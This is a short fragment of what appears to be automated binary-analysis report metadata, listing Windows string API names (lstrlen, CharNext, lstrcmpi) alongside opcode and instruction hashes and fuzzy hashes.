                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                            • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                            • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9